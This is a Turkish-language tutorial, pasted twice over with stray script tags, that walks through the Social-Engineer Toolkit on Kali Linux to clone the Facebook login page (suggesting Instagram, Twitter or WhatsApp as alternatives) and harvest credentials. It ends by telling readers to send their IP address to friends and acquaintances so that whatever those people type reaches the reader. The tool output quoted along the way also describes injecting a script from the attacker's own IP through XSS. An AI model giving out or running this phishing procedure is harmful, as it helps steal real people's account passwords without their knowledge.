Bu sizin locahostunuza apache2 server a işlenecek ama bunlardan önce kali linux kullanın ve bunları yapmadan önce service start apache2 deyin
Öncelikle setoolkit indirmemiz gerek varsa setoolkit diyip çalıştırmamız gerek.
github.com
Sonra karşınıza şöyle bir ekran çıkacak
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.
Join us on irc.freenode.net in channel #setoolkit
Select from the menu:
1) Spear-***unacceptable content** Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third Party Modules
10) Update the Metasploit Framework
11) Update the Social-Engineer Toolkit
12) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set > 2
2 diyoruz ve devam ediyoruz sonra karşımıza böyle bir şey çıkacak
The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit
browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web-
site that has a username and password field and harvest all the
information posted to the website.
The TabNabbing method will wait for a user to move to a different
tab, then refresh the page to something different.
The Man Left in the Middle Attack method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
data from them. You need to have an already vulnerable site and in-
corporate <script src="http://YOURIP/">. This could either be from a
compromised site or through XSS.
The Web-Jacking Attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack > 3
3 diyoruz ve yine devam ediyoruz sonra karşımıza bir şey daha çıkacak
[-] Email harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack > Enter the url to clone: facebook.com yazabilirsiniz buraya(Sizler başka siteler ekleyebilirsiniz.Örneğin : instagram.com veya twitter.com ya da whatsapp.com gibi)
[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]
Press {return} to continue.(Enter tuşuna basınız)
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
ve bitti bundan sonra ifconfig yazıp ipinize bakıp bunu arkadaşınıza eş dost a attığınızda aynı ağdaysanız adam bilgilerini girdiğinde bu bilgiler size gelecek
</script>
Öncelikle setoolkit indirmemiz gerek varsa setoolkit diyip çalıştırmamız gerek.
GitHub - trustedsec/social-engineer-toolkit: The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.
The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here. - GitHub - trustedsec/social-engineer-toolkit: The Social-Engineer Toolkit (SET) reposi...
Sonra karşınıza şöyle bir ekran çıkacak
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.
Join us on irc.freenode.net in channel #setoolkit
Select from the menu:
1) Spear-***unacceptable content** Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third Party Modules
10) Update the Metasploit Framework
11) Update the Social-Engineer Toolkit
12) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set > 2
2 diyoruz ve devam ediyoruz sonra karşımıza böyle bir şey çıkacak
The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit
browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web-
site that has a username and password field and harvest all the
information posted to the website.
The TabNabbing method will wait for a user to move to a different
tab, then refresh the page to something different.
The Man Left in the Middle Attack method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
data from them. You need to have an already vulnerable site and in-
corporate <script src="http://YOURIP/">. This could either be from a
compromised site or through XSS.
The Web-Jacking Attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack > 3
3 diyoruz ve yine devam ediyoruz sonra karşımıza bir şey daha çıkacak
[-] Email harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack > Enter the url to clone: facebook.com yazabilirsiniz buraya(Sizler başka siteler ekleyebilirsiniz.Örneğin : instagram.com veya twitter.com ya da whatsapp.com gibi)
[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]
Press {return} to continue.(Enter tuşuna basınız)
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
ve bitti bundan sonra ifconfig yazıp ipinize bakıp bunu arkadaşınıza eş dost a attığınızda aynı ağdaysanız adam bilgilerini girdiğinde bu bilgiler size gelecek
</script>